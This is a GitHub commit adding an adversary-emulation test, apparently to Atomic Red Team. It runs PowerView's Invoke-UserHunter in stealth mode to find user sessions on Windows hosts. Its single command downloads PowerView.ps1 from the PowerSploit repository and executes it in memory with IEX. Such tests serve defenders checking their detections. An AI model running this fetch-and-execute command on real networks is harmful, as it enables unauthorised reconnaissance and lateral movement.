write test (#1003)

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
This commit is contained in:
Andrew Beers
2020-05-21 16:31:27 -05:00
committed by GitHub
parent 9e89627f3b
commit e3786e4dc3
+11
View File
@@ -51,3 +51,14 @@ atomic_tests:
users
w
who
- name: Find computers where user has session - Stealth mode (PowerView)
description:
Find existing user session on other computers. Upon execution, information about any sessions discovered will be displayed.
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: |
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'); Invoke-UserHunter -Stealth -Verbose